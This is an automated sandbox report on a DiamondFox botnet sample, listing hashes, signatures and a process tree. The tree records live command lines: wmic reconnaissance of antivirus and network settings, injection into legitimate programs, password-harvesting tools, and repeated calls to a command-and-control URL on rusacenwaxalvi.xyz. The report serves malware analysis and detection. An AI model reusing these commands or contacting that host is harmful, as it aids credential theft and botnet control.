Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-02-2021 10:45
General
-
Target
958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
-
Size
392KB
-
MD5
58e3dd75dabaa2d6e81118b2f7ca854a
-
SHA1
ccab657f017855ddf2e0ed0341f39f1036ce8523
-
SHA256
958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7
-
SHA512
7fa5ff90c155e6370545d6226993411e2bbcca2e33f375fde72bea8437139c5f4e5c9fe4ccd18a5d5906817567b6153b1c5d4480e56a2b9d7263f5e1e657e13e
Score
10/10
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 1 IoCs
Detects DiamondFox payload in file/memory.
-
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
-
Nirsoft 9 IoCs
-
Executes dropped EXE 14 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
JavaScript code in executable 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 16 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Program crash 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 36 IoCs
-
Suspicious use of AdjustPrivilegeToken 384 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 677 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe"C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\2.log"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 884⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\3.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/VisitTimeFilterType 2 /VisitTimeFilterValue 6 /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\6.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\5.log"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 884⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d8413⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 885⤵
- Program crash
-
C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\86.0.4240.111_chrome_installer.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\CHROME.PACKED.7Z" X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff75ac57740,0x7ff75ac57750,0x7ff75ac577606⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --force-first-run6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffb8b4d6e00,0x7ffb8b4d6e10,0x7ffb8b4d6e207⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:27⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1764 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings7⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6db7a7740,0x7ff6db7a7750,0x7ff6db7a77608⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6184 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6172 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6440 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6704 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7316 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7576 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7292 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7696 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7944 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8108 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8224 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8644 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:87⤵
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d8413⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d8413⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d8413⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 5924⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d8413⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 884⤵
- Program crash
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exeMD5
11830f1a300333403b5662a23b78eae7
SHA131d02fd99b15e14fb7416ad158b04afcbf5049cc
SHA2565d7dba6ea5a68525951cfcdad8d46838b812b7a9e10ec81ca4ddc961a44d9055
SHA51218c3ff71a829627bd62734f9a85218a29cbd162b35af298c376eda1ac8376abd6600f5c77cf3031685b253ba3e56d1933cf623f57ac30d1cffe084cb2cb93171
-
C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exeMD5
11830f1a300333403b5662a23b78eae7
SHA131d02fd99b15e14fb7416ad158b04afcbf5049cc
SHA2565d7dba6ea5a68525951cfcdad8d46838b812b7a9e10ec81ca4ddc961a44d9055
SHA51218c3ff71a829627bd62734f9a85218a29cbd162b35af298c376eda1ac8376abd6600f5c77cf3031685b253ba3e56d1933cf623f57ac30d1cffe084cb2cb93171
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
69bd9f17b9a7aa1325b1f8decd64db9e
SHA1ac356ab8b9737025aeaacaed396bb838ebced599
SHA256b3884edefdcc0f8309b1896c17b0db26b0a507d2311d25762ef66b78abaddf99
SHA512a584ab8b536005fd2a8bc1c1c672f09b80dc7c9a9b2d38c0a9648168300cee9b5f9d7bcaa99037eea7756de5b4c53c2e174720949fc516051b9656b5607f5320
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
69bd9f17b9a7aa1325b1f8decd64db9e
SHA1ac356ab8b9737025aeaacaed396bb838ebced599
SHA256b3884edefdcc0f8309b1896c17b0db26b0a507d2311d25762ef66b78abaddf99
SHA512a584ab8b536005fd2a8bc1c1c672f09b80dc7c9a9b2d38c0a9648168300cee9b5f9d7bcaa99037eea7756de5b4c53c2e174720949fc516051b9656b5607f5320
-
C:\Users\Admin\AppData\Local\Temp\chrome_installer.logMD5
0758eec88b0de4552bda6d10ccb3abb2
SHA1895984f373e482124af30e16296cf828cabd5c34
SHA25694a434af5bac153d8ce05258774bf30a77afe8677f3310f0c247d06842814295
SHA5126fb0c0ca54311974b8d7a5fd3ebfca09b9f49d8a163d91cf182c1bf48bec7bad728ad8ea3290babe6d01a2408760be72991b01dafbfba47540cdd83ef18d6e49
-
C:\Users\Admin\AppData\Roaming\EdgeCP\1.logMD5
c899085ae52e1212260bd31f38dd7cad
SHA1482ebdfa75ac934e022670beea5258f08863abcb
SHA25620c8330e6a19bd31b379f102f9ede1fd315fc763dd1d805b310ade04860d69cf
SHA5123139ffb0e6c9ac312dd38aed58953b5249c8374529972553353e40bef982376b71f7a3551abd860f17443708d032c03feb2795860510a33df3abd35aebda155e
-
